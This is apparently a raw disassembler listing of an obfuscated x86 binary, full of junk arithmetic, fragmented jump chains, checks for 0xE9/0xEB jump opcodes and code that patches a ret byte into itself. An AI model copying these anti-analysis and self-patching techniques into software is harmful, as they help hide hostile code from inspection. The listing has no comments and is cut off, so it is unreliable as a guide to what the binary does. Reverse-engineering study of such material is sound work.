		add	esi, 0AFB456D4h
		mov	[esi], eax
		pop	esi
		jmp	loc_454766
; END OF FUNCTION CHUNK	FOR sub_44E481

; =============== S U B	R O U T	I N E =======================================



sub_446163	proc near		; DATA XREF: sub_451EB7-142E8o
		jz	loc_43D872
		mov	eax, [ebp-4]
sub_446163	endp ; sp-analysis failed

; START	OF FUNCTION CHUNK FOR sub_443CD9

loc_44616C:				; CODE XREF: sub_443CD9:loc_44B70Fj
		cmp	byte ptr [eax],	0E9h
		jz	loc_43D872
		mov	eax, [ebp-4]
		cmp	byte ptr [eax],	0EBh
		jz	loc_43D872
		jmp	loc_45C0BF
; END OF FUNCTION CHUNK	FOR sub_443CD9
; ---------------------------------------------------------------------------

loc_446186:				; CODE XREF: k2vbe3.d:00441723j
		cdq
		test	ebp, edx
		jmp	loc_4468ED
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44B912

loc_44618E:				; CODE XREF: sub_44B912:loc_44191Bj
					; k2vbe3.d:0044F0C3j
		rol	ecx, 5
		call	sub_454639

loc_446196:				; CODE XREF: sub_44C90E+5310j
		jmp	loc_444F4A
; END OF FUNCTION CHUNK	FOR sub_44B912
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_440C94

loc_44619B:				; CODE XREF: sub_440C94+124j
		jmp	sub_4553CC
; END OF FUNCTION CHUNK	FOR sub_440C94

; =============== S U B	R O U T	I N E =======================================



sub_4461A0	proc near		; CODE XREF: k2vbe3.d:0043C558j
					; sub_4479A1+71Cp
		xchg	ecx, [esp+0]
		pop	ecx
		mov	[ebp-4], eax
		mov	eax, [ebp-4]
		mov	al, [eax]
		jmp	loc_45536C
sub_4461A0	endp ; sp-analysis failed

; ---------------------------------------------------------------------------

loc_4461B1:				; CODE XREF: k2vbe3.d:loc_45A51Dj
		or	eax, 0E06A1787h
		add	eax, 4DF46E0h
		jnb	loc_44A9A8
; START	OF FUNCTION CHUNK FOR sub_44B912

loc_4461C3:				; CODE XREF: sub_44B912-93DFj
		jmp	loc_4545D8
; END OF FUNCTION CHUNK	FOR sub_44B912
; ---------------------------------------------------------------------------
		add	edi, 0A8BA76A7h
		xchg	edx, ebx
		jmp	loc_44A9A7

; =============== S U B	R O U T	I N E =======================================



sub_4461D5	proc near		; CODE XREF: sub_43D7A9:loc_4540A4j

var_4		= dword	ptr -4

; FUNCTION CHUNK AT 0043FFD2 SIZE 0000000A BYTES
; FUNCTION CHUNK AT 004450C0 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00447A16 SIZE 00000008 BYTES
; FUNCTION CHUNK AT 004484FA SIZE 0000000A BYTES
; FUNCTION CHUNK AT 00448958 SIZE 00000006 BYTES
; FUNCTION CHUNK AT 0044910F SIZE 00000011 BYTES
; FUNCTION CHUNK AT 0044BC57 SIZE 0000000D BYTES
; FUNCTION CHUNK AT 0044BF8F SIZE 00000016 BYTES
; FUNCTION CHUNK AT 0044C213 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00452FD0 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00454411 SIZE 00000006 BYTES
; FUNCTION CHUNK AT 00456992 SIZE 00000008 BYTES
; FUNCTION CHUNK AT 00458425 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0045961A SIZE 0000000F BYTES

		push	ebx
		adc	esi, 3CF1E4D9h
		jmp	loc_447A16
sub_4461D5	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45512F

loc_4461E1:				; CODE XREF: sub_45512F:loc_43C9FBj
		push	edx
		jo	loc_45A83C
		jmp	loc_449B1C
; END OF FUNCTION CHUNK	FOR sub_45512F
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_445124

loc_4461ED:				; CODE XREF: sub_445124:loc_442EE9j
		add	eax, 18h
		mov	[ebp-4], eax
		mov	eax, [ebp-10h]
		test	eax, eax
		jmp	loc_43EB1D
; END OF FUNCTION CHUNK	FOR sub_445124
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_450F71

loc_4461FD:				; CODE XREF: sub_450F71:loc_4481A3j
		pop	esi
		rol	esi, 1Bh
		and	esi, 41382F39h
		add	esi, 0C2E68975h
		jmp	loc_441782
; END OF FUNCTION CHUNK	FOR sub_450F71

; =============== S U B	R O U T	I N E =======================================



sub_446212	proc near		; CODE XREF: sub_440D6A+1718Aj
		add	esp, 0FFFFFFD0h
		push	0EBBB5089h
		pop	eax
		sub	eax, 0AC4971E2h
		rol	eax, 13h
		xor	eax, 0F539FB9Ch
		jmp	loc_44D0E1
sub_446212	endp

; ---------------------------------------------------------------------------
		mov	ds:off_41E03C, eax
		lea	eax, loc_4431E0
		mov	byte ptr [eax],	0C3h
		jmp	loc_444DA4

; =============== S U B	R O U T	I N E =======================================



sub_446243	proc near		; CODE XREF: sub_41A84D+41p
					; sub_41A84D+44p ...
		call	sub_446258
		jmp	ds:off_41E040
sub_446243	endp

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44471B

loc_44624E:				; CODE XREF: sub_44471B+12242j
		jmp	sub_45B74D
; END OF FUNCTION CHUNK	FOR sub_44471B
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44D863

loc_446253:				; CODE XREF: sub_44D863+7F34j
		jmp	loc_440AC0
; END OF FUNCTION CHUNK	FOR sub_44D863

; =============== S U B	R O U T	I N E =======================================



sub_446258	proc near		; CODE XREF: k2vbe3.d:0043D4C5j
					; k2vbe3.d:0043FD21j ...

var_8		= dword	ptr -8
var_4		= dword	ptr -4

; FUNCTION CHUNK AT 0043CA6F SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0043D4CA SIZE 00000009 BYTES
; FUNCTION CHUNK AT 0043D56B SIZE 0000000C BYTES
; FUNCTION CHUNK AT 0043FEA3 SIZE 00000020 BYTES
; FUNCTION CHUNK AT 0044028B SIZE 0000001B BYTES
; FUNCTION CHUNK AT 00442E42 SIZE 0000000E BYTES
; FUNCTION CHUNK AT 00444A73 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044560A SIZE 00000006 BYTES
; FUNCTION CHUNK AT 0044792F SIZE 00000017 BYTES
; FUNCTION CHUNK AT 0044A80D SIZE 0000001C BYTES
; FUNCTION CHUNK AT 0044ACB4 SIZE 00000007 BYTES
; FUNCTION CHUNK AT 0044B577 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044FC79 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0045032A SIZE 0000000D BYTES
; FUNCTION CHUNK AT 00450B30 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0045551B SIZE 0000000B BYTES
; FUNCTION CHUNK AT 004581AA SIZE 00000016 BYTES
; FUNCTION CHUNK AT 0045B072 SIZE 00000013 BYTES

		pop	edx
		jmp	loc_4581AA
sub_446258	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4497D1

loc_44625E:				; CODE XREF: sub_4497D1+Cj
		push	0B109A316h
		pop	eax
		or	eax, 0EE99DB40h
		xor	eax, 7418AE30h
		sub	eax, 86BF96D3h
		xor	eax, 0FB71DE74h

loc_44627C:				; CODE XREF: k2vbe3.d:loc_459EAAj
		push	edx
		jmp	loc_44EC37
; END OF FUNCTION CHUNK	FOR sub_4497D1
; ---------------------------------------------------------------------------

loc_446282:				; CODE XREF: k2vbe3.d:00457CE7j
		popf
		sub	edi, 5298D5F2h

loc_446289:				; CODE XREF: k2vbe3.d:loc_440A20j
		and	ecx, ds:4000EEh
		cmp	ecx, 354C5DC7h
		jmp	loc_45AD80
; ---------------------------------------------------------------------------
		not	ecx
		jmp	sub_4529E2
; ---------------------------------------------------------------------------

locret_4462A1:				; CODE XREF: k2vbe3.d:0044A04Bj
		retn
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_456541

loc_4462A2:				; CODE XREF: sub_456541+37B3j
		jmp	loc_44D086
; END OF FUNCTION CHUNK	FOR sub_456541
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_450CBF

loc_4462A7:				; CODE XREF: sub_450CBF+6782j
		jmp	loc_45908E
; END OF FUNCTION CHUNK	FOR sub_450CBF
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4552BE

loc_4462AC:				; CODE XREF: sub_4552BE+Aj
		jmp	loc_44149B
; END OF FUNCTION CHUNK	FOR sub_4552BE

; =============== S U B	R O U T	I N E =======================================



sub_4462B1	proc near		; DATA XREF: sub_45A5FF:loc_457321o

var_4		= dword	ptr -4

; FUNCTION CHUNK AT 0044DF29 SIZE 00000013 BYTES

		call	sub_44128B
		push	6C80E7Dh
		pop	edx
		rol	edx, 3
		xor	edx, 0A8D9C1D6h
		call	sub_45B20A
		push	edx
		jmp	loc_44DF29
sub_4462B1	endp

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44C90E

loc_4462D0:				; CODE XREF: sub_44C90E:loc_450A0Fj
		mov	eax, [ebp+8]
		push	ebp
		mov	ebp, edx
		xchg	ebp, [esp+124h+var_124]
		mov	edx, eax
		jmp	loc_44D82E
; END OF FUNCTION CHUNK	FOR sub_44C90E

; =============== S U B	R O U T	I N E =======================================



sub_4462E0	proc near		; CODE XREF: sub_44D59D+52D5j
		push	ebx
		pushf
		push	offset sub_447266
		jmp	nullsub_331
sub_4462E0	endp

; ---------------------------------------------------------------------------
		mov	eax, [esp]
		call	sub_453347
		retn
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4420B5

loc_4462F5:				; CODE XREF: sub_4420B5+Fj
		jmp	nullsub_39
; END OF FUNCTION CHUNK	FOR sub_4420B5
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44B979

loc_4462FA:				; CODE XREF: sub_44B979:loc_45B259j
		push	ecx
		jmp	loc_4501BA
; END OF FUNCTION CHUNK	FOR sub_44B979
; ---------------------------------------------------------------------------

loc_446300:				; DATA XREF: sub_45762D-15367o
		push	0EDD31655h
		pop	ecx
		rol	ecx, 5
		jb	loc_44BB8B
		and	edi, 0A2710E98h
		jmp	loc_455AD4
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_441172

loc_44631A:				; CODE XREF: sub_441172+7E8Fj
		mov	ebx, [edi]

loc_44631C:				; CODE XREF: sub_441172:loc_450A35j
		call	sub_44128B
		mov	edx, 81424EE7h
		push	ecx
		jmp	loc_4573E5
; END OF FUNCTION CHUNK	FOR sub_441172
; ---------------------------------------------------------------------------

loc_44632C:				; CODE XREF: k2vbe3.d:004509F2j
		jbe	loc_45BEF1
; START	OF FUNCTION CHUNK FOR sub_44A6BD

loc_446332:				; CODE XREF: sub_44A6BD:loc_447481j
					; k2vbe3.d:0044F3C6j
		or	ebx, 0E3CD130Fh
		add	ebx, 1068628Eh
		xchg	ebx, [esp+8+var_8]
		jmp	loc_44A76F
; END OF FUNCTION CHUNK	FOR sub_44A6BD
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43DA1E

loc_446346:				; CODE XREF: sub_43DA1E:loc_44099Cj
		or	ebp, 4028012Ch
		sbb	eax, edi
		jmp	loc_4495F0
; END OF FUNCTION CHUNK	FOR sub_43DA1E

; =============== S U B	R O U T	I N E =======================================



sub_446353	proc near		; DATA XREF: sub_44367E+8BCDo
		push	ebx
		push	offset sub_44A2DF
		jmp	nullsub_40
sub_446353	endp


; =============== S U B	R O U T	I N E =======================================

; Attributes: thunk


sub_44635E	proc near		; CODE XREF: sub_442F31:loc_457D95j
		retn
sub_44635E	endp

; ---------------------------------------------------------------------------
		push	ebx
		push	0AD880697h
		pop	ebx
		sub	ebx, 0B13C5074h
		and	ebx, 790BB361h
		jmp	loc_43F7FF
; ---------------------------------------------------------------------------
		test	ebx, 0BF92E314h
		jmp	loc_444088

; =============== S U B	R O U T	I N E =======================================



sub_446382	proc near		; CODE XREF: k2vbe3.d:0044AA0Fj
					; sub_458899+Bp

; FUNCTION CHUNK AT 0043D090 SIZE 00000005 BYTES

		xchg	ecx, [esp+0]
		pop	ecx
		call	sub_4553CC
		push	esi
		push	0F7E14219h
		pop	esi
		rol	esi, 16h
		add	esi, 79C3E864h
		jmp	loc_43D090
sub_446382	endp ; sp-analysis failed

; ---------------------------------------------------------------------------

loc_4463A0:				; CODE XREF: k2vbe3.d:0043EDCDj
		jb	loc_458A4E
		ror	ebx, 1Fh
; START	OF FUNCTION CHUNK FOR sub_44B979

loc_4463A9:				; CODE XREF: sub_44B979-D9B8j
		call	sub_43D823
; END OF FUNCTION CHUNK	FOR sub_44B979
; START	OF FUNCTION CHUNK FOR sub_44D0D5

loc_4463AE:				; CODE XREF: sub_44D0D5+16C2j
		jmp	loc_455AEB
; END OF FUNCTION CHUNK	FOR sub_44D0D5
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44111E

loc_4463B3:				; CODE XREF: sub_44111E+9j
		jmp	sub_44869D
; END OF FUNCTION CHUNK	FOR sub_44111E
; ---------------------------------------------------------------------------

loc_4463B8:				; CODE XREF: k2vbe3.d:00455CB1j
		push	ecx

loc_4463B9:				; CODE XREF: k2vbe3.d:loc_442F26j
		mov	eax, [ebp-18h]
		mov	eax, [eax+24h]
		push	ecx
		push	4DE085E4h
		pop	ecx
		xor	ecx, 0F2D1FF07h
		jmp	loc_455EE3
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43FF59

loc_4463D1:				; CODE XREF: sub_43FF59-1DD8j
		cmp	edi, ebp
		jmp	loc_4480C2
; END OF FUNCTION CHUNK	FOR sub_43FF59
; ---------------------------------------------------------------------------

loc_4463D8:				; CODE XREF: k2vbe3.d:004404A3j
		test	ecx, 20000000h
		jmp	loc_45B421
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44529A

loc_4463E3:				; CODE XREF: sub_44529A+Bj
		pop	edx
		mov	eax, ds:dword_44DA54
		push	offset loc_456CB3
		jmp	nullsub_41
; END OF FUNCTION CHUNK	FOR sub_44529A
; ---------------------------------------------------------------------------
		add	edx, 0EA6D3960h
		jmp	sub_451E00
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44DB59

loc_4463FF:				; CODE XREF: sub_44DB59:loc_45A16Cj
		mov	ebp, esi
		sub	edi, 69B37199h
		cdq
		popf
		jmp	loc_4439B2
; END OF FUNCTION CHUNK	FOR sub_44DB59
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43CCD0

loc_44640E:				; CODE XREF: sub_43CCD0:loc_442A97j
					; k2vbe3.d:00442AAFj
		add	ecx, 64020E9Dh
		add	esi, ecx
		pop	ecx
		mov	esi, [esi]
		xchg	esi, [esp+0]
		jmp	loc_456348
; END OF FUNCTION CHUNK	FOR sub_43CCD0
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45A323

loc_446421:				; CODE XREF: sub_45A323:loc_44AF66j
		jnz	loc_45AC03
		jmp	loc_442855
; END OF FUNCTION CHUNK	FOR sub_45A323

; =============== S U B	R O U T	I N E =======================================



sub_44642C	proc near		; CODE XREF: sub_454639-176A8p
					; k2vbe3.d:00458473j
		xchg	esi, [esp+0]
		pop	esi
		pop	esi
		retn
sub_44642C	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45AAEB

loc_446432:				; CODE XREF: sub_45AAEB+Cj
		jmp	loc_44E5F5
; END OF FUNCTION CHUNK	FOR sub_45AAEB
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_455BEA

loc_446437:				; CODE XREF: sub_455BEA-143A5j
		rol	eax, 17h
		jmp	loc_4521C6
; END OF FUNCTION CHUNK	FOR sub_455BEA
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4506C3

loc_44643F:				; CODE XREF: sub_4506C3:loc_448F2Bj
		xchg	ecx, [esp+0]
		jmp	sub_459B61
; END OF FUNCTION CHUNK	FOR sub_4506C3
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4440B5

loc_446447:				; CODE XREF: sub_4440B5:loc_44EA1Aj
		mov	edx, ecx

loc_446449:				; CODE XREF: sub_43DA1E+BFE0j
		pop	ecx

loc_44644A:				; CODE XREF: k2vbe3.d:00446090j
		jns	loc_452E7F
		mov	eax, [esp-4+arg_0]
		jmp	loc_45703E
; END OF FUNCTION CHUNK	FOR sub_4440B5
; ---------------------------------------------------------------------------
		not	eax
		pop	edi
		jmp	sub_44AF0C
; ---------------------------------------------------------------------------
		cdq

loc_446461:				; CODE XREF: k2vbe3.d:loc_43F15Ej
		jmp	loc_44D8DD
; ---------------------------------------------------------------------------
		mov	edi, edx
		jmp	loc_440E88
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45A323

loc_44646D:				; CODE XREF: sub_45A323:loc_44CA15j
		jz	loc_4403AD
		jmp	loc_459709
; END OF FUNCTION CHUNK	FOR sub_45A323

; =============== S U B	R O U T	I N E =======================================



sub_446478	proc near		; CODE XREF: k2vbe3.d:004440C5j
					; sub_45995B+5p

var_C		= dword	ptr -0Ch
arg_0		= dword	ptr  4

; FUNCTION CHUNK AT 004400B0 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00440578 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044202C SIZE 0000000D BYTES
; FUNCTION CHUNK AT 00442A80 SIZE 00000012 BYTES
; FUNCTION CHUNK AT 00442EAE SIZE 0000000D BYTES
; FUNCTION CHUNK AT 00446C3A SIZE 00000006 BYTES
; FUNCTION CHUNK AT 00449082 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00449FF2 SIZE 00000017 BYTES
; FUNCTION CHUNK AT 0044D1B8 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004503C5 SIZE 00000011 BYTES
; FUNCTION CHUNK AT 004569F9 SIZE 0000001F BYTES
; FUNCTION CHUNK AT 00456ED5 SIZE 0000001A BYTES
; FUNCTION CHUNK AT 0045807C SIZE 0000000A BYTES
; FUNCTION CHUNK AT 00459917 SIZE 00000012 BYTES
; FUNCTION CHUNK AT 00459AB0 SIZE 00000018 BYTES

		xchg	edi, [esp+0]
		pop	edi
		call	sub_44BA05
		push	ebx
		jmp	loc_4569F9
sub_446478	endp ; sp-analysis failed

; ---------------------------------------------------------------------------

loc_446487:				; DATA XREF: sub_44B684+1o
		mov	ebp, esp
		add	esp, 0FFFFFFF4h
		call	sub_443528
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_32. PRESS	KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44B4E4

loc_446492:				; CODE XREF: sub_44B4E4:loc_451F28j
					; k2vbe3.d:loc_459557j
		xchg	ecx, [esp+4+var_4]
		mov	ebp, esp
		add	esp, 0FFFFFFECh
		push	offset loc_440FB7
		jmp	nullsub_120
; END OF FUNCTION CHUNK	FOR sub_44B4E4
; ---------------------------------------------------------------------------
		jnz	loc_44549E
		mov	[ebx], eax
		jmp	sub_45A5FF
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_450E86

loc_4464B1:				; CODE XREF: sub_450E86+3j
		push	edi
		mov	edi, ebx
		xchg	edi, [esp+0Ch+var_C]
		push	offset loc_44048A
		jmp	loc_447F32
; END OF FUNCTION CHUNK	FOR sub_450E86
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4479A1

loc_4464C1:				; CODE XREF: sub_4479A1:loc_45432Bj
		call	sub_44E6B8
		add	ebx, eax
		jmp	sub_454354
; END OF FUNCTION CHUNK	FOR sub_4479A1
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4512B9

loc_4464CD:				; CODE XREF: sub_4512B9:loc_44A724j
		push	ecx
		mov	ecx, eax
		xchg	ecx, [esp+8+var_8]
		call	sub_4505F8
		call	sub_45AFC0
		jmp	nullsub_398
; END OF FUNCTION CHUNK	FOR sub_4512B9
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44FF20

loc_4464E2:				; CODE XREF: sub_44FF20:loc_44BD3Cj
		add	ebx, 0BA4B34E0h
		rol	ebx, 7
		xor	ebx, 0CFD66A3Ch
		sub	ebx, 0D41BB06Eh
		add	ebx, 0A5C075C4h
		jmp	loc_454B1B
; END OF FUNCTION CHUNK	FOR sub_44FF20
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_37. PRESS	KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_459798

loc_446503:				; CODE XREF: sub_459798+Bj
		jmp	nullsub_487
; END OF FUNCTION CHUNK	FOR sub_459798
; ---------------------------------------------------------------------------

loc_446508:				; DATA XREF: sub_44A4F5+4o
		imul	dword ptr [edx-4]
		add	eax, 2

loc_44650E:				; CODE XREF: k2vbe3.d:loc_451131j
		mov	[ebp-0Ch], eax
		mov	eax, [ebp-0Ch]
		jmp	loc_44A142
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4507E3

loc_446519:				; CODE XREF: sub_4507E3:loc_44DD59j
		call	sub_4508A3
		jmp	loc_44E47C
; END OF FUNCTION CHUNK	FOR sub_4507E3

; =============== S U B	R O U T	I N E =======================================



sub_446523	proc near		; CODE XREF: sub_4436CE+3j
		add	esp, 0FFFFFFECh
		call	sub_441632

loc_44652B:				; CODE XREF: k2vbe3.d:00455BFDj
		jmp	nullsub_9
sub_446523	endp

; ---------------------------------------------------------------------------

locret_446530:				; CODE XREF: k2vbe3.d:00442209j
		retn
; ---------------------------------------------------------------------------

loc_446531:				; CODE XREF: k2vbe3.d:0044FECFj
		jmp	loc_442F26
; ---------------------------------------------------------------------------

loc_446536:				; CODE XREF: k2vbe3.d:loc_44D2E7j
		jnz	loc_44D3F1
		jmp	loc_44AC7A
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_447C43

loc_446541:				; CODE XREF: sub_447C43+2E4Aj
		pop	eax
		or	eax, 0DD06758h
		xor	eax, 7254C71Eh
		add	eax, 447BD592h
		push	offset loc_43D6FD
		jmp	nullsub_486
; END OF FUNCTION CHUNK	FOR sub_447C43

; =============== S U B	R O U T	I N E =======================================



sub_44655E	proc near		; CODE XREF: sub_452F31j
					; DATA XREF: sub_4511F7+1D30o

var_8		= dword	ptr -8
arg_0		= dword	ptr  4

; FUNCTION CHUNK AT 00443856 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00452C86 SIZE 00000008 BYTES
; FUNCTION CHUNK AT 00454720 SIZE 00000022 BYTES
; FUNCTION CHUNK AT 00454AC0 SIZE 00000005 BYTES

		xchg	ecx, [esp+0]
		mov	edx, ecx
		pop	ecx
		mov	eax, [esp-4+arg_0]
		push	edx
		call	sub_44A7C2
		jmp	loc_454720
sub_44655E	endp

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43CCD0

loc_446572:				; CODE XREF: sub_43CCD0+620Ej
					; sub_4506C3:loc_452602j
		pop	esi
		and	esi, 0A9F70C0Bh
		rol	esi, 15h
		test	esi, 10h
		jmp	loc_43C00C
; END OF FUNCTION CHUNK	FOR sub_43CCD0
; ---------------------------------------------------------------------------
		shr	ebx, 13h
		jmp	loc_44C747
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43DA1E

loc_44658F:				; CODE XREF: sub_43DA1E+F17Aj
		xor	eax, 40DA1F7Ch
		add	eax, ebp
		push	offset loc_45947F
		jmp	loc_45BCD9
; END OF FUNCTION CHUNK	FOR sub_43DA1E
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_444D7B

loc_4465A1:				; CODE XREF: sub_444D7B:loc_456A78j
		rol	ecx, 12h
		cmp	ecx, 0B4D2C240h
		jmp	loc_452651
; END OF FUNCTION CHUNK	FOR sub_444D7B
; ---------------------------------------------------------------------------

loc_4465AF:				; CODE XREF: k2vbe3.d:00441957j
		xor	eax, ecx

; =============== S U B	R O U T	I N E =======================================



sub_4465B1	proc near		; CODE XREF: sub_459382:loc_444533p

; FUNCTION CHUNK AT 0044A13D SIZE 00000005 BYTES

		xchg	edx, [esp+0]
		pop	edx
		push	ebp
		mov	ebp, esp
		push	ecx
		push	offset loc_453A60
		jmp	loc_44A13D
sub_4465B1	endp

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43CCD0

loc_4465C3:				; CODE XREF: sub_43CCD0:loc_459F1Aj
		jnz	loc_449237
		jmp	loc_43CAAE
; END OF FUNCTION CHUNK	FOR sub_43CCD0
; ---------------------------------------------------------------------------

loc_4465CE:				; CODE XREF: k2vbe3.d:00450EC0j
		test	esi, 0DF1F60FCh
		jmp	loc_441B5A
; ---------------------------------------------------------------------------

loc_4465D9:				; CODE XREF: k2vbe3.d:004505C1j
		jle	loc_44B0D3
		not	eax

loc_4465E1:				; CODE XREF: k2vbe3.d:00451D2Dj
		jmp	sub_449661
; ---------------------------------------------------------------------------

loc_4465E6:				; CODE XREF: k2vbe3.d:0043F2C2j
		ja	loc_45555C
		and	edi, 3EFBEBCCh
		jmp	loc_43CF83
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44B94B

loc_4465F7:				; CODE XREF: sub_44B94B-3A3Dj
		rol	ecx, 3

loc_4465FA:				; CODE XREF: sub_449372-A2D5j
					; sub_44B94B-C8A5j ...
		jnb	loc_45289D
		cmp	dword ptr [ebp-4], 6
		jnz	loc_43EF2E
		jmp	loc_4492DC
; END OF FUNCTION CHUNK	FOR sub_44B94B

; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_44660F	proc near		; CODE XREF: sub_447664-5A06p
					; sub_447664:loc_44CA63j ...

var_10		= dword	ptr -10h
var_4		= dword	ptr -4
arg_4		= dword	ptr  0Ch

; FUNCTION CHUNK AT 0043CBAC SIZE 00000008 BYTES
; FUNCTION CHUNK AT 0043CD49 SIZE 0000000A BYTES
; FUNCTION CHUNK AT 0043E1D6 SIZE 00000024 BYTES
; FUNCTION CHUNK AT 00446984 SIZE 00000014 BYTES
; FUNCTION CHUNK AT 0044FBD5 SIZE 0000000A BYTES
; FUNCTION CHUNK AT 00450E17 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00450F29 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 004520A4 SIZE 0000000C BYTES
; FUNCTION CHUNK AT 004520C8 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00452EE3 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 004554ED SIZE 0000000D BYTES
; FUNCTION CHUNK AT 004582F3 SIZE 0000001A BYTES
; FUNCTION CHUNK AT 004583DB SIZE 00000013 BYTES
; FUNCTION CHUNK AT 0045AD30 SIZE 00000012 BYTES

		push	ebp
		mov	ebp, esp
		push	ecx
		push	ecx
		push	5EDF47DBh
		pop	ecx
		or	ecx, 4645424Bh
		jns	loc_43E1D6

loc_446626:				; CODE XREF: k2vbe3.d:0044C53Dj
		jmp	loc_450F29
sub_44660F	endp ; sp-analysis failed


; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_44662B	proc near		; CODE XREF: sub_4486D7+18E7p
					; sub_44D0D5:loc_44C5AFp ...

var_4		= dword	ptr -4

; FUNCTION CHUNK AT 0043CBCC SIZE 0000000D BYTES
; FUNCTION CHUNK AT 0043F40E SIZE 00000014 BYTES
; FUNCTION CHUNK AT 00440322 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00441231 SIZE 00000032 BYTES
; FUNCTION CHUNK AT 00444695 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00445621 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00446AC5 SIZE 0000000A BYTES
; FUNCTION CHUNK AT 00447DD4 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044953C SIZE 00000017 BYTES
; FUNCTION CHUNK AT 0044AB21 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044CDAE SIZE 00000011 BYTES
; FUNCTION CHUNK AT 0044D4E4 SIZE 0000001B BYTES
; FUNCTION CHUNK AT 0044F89A SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00453BF0 SIZE 0000001A BYTES
; FUNCTION CHUNK AT 004595A7 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0045B878 SIZE 0000000D BYTES

		push	ecx
		mov	ecx, ebp
		xchg	ecx, [esp+0]
		mov	ebp, esp
		js	sub_450E86
		add	esp, 0FFFFFFF8h
		push	ebx
		mov	[ebp+var_4], eax
		jmp	loc_44F89A
sub_44662B	endp


; =============== S U B	R O U T	I N E =======================================



sub_446645	proc near		; DATA XREF: k2vbe3.d:loc_446FA1o

; FUNCTION CHUNK AT 00459BF8 SIZE 00000012 BYTES

		xchg	ebx, [esp+0]
		lea	eax, [ebp-2C8h]
		push	eax
		push	4C91A0h
		push	221D6CBBh
		pop	eax
		sub	eax, 0E13B065h
		xor	eax, 0B118AF62h
		jmp	loc_459BF8
sub_446645	endp

; [00000001 BYTES: COLLAPSED FUNCTION nullsub_364. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_450F71

loc_44666C:				; CODE XREF: k2vbe3.d:0043EB65j
					; sub_450F71+2724j
		call	sub_4568DA

locret_446671:				; CODE XREF: sub_45AB7E:loc_446C41j
		retn
; END OF FUNCTION CHUNK	FOR sub_450F71
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45BE94

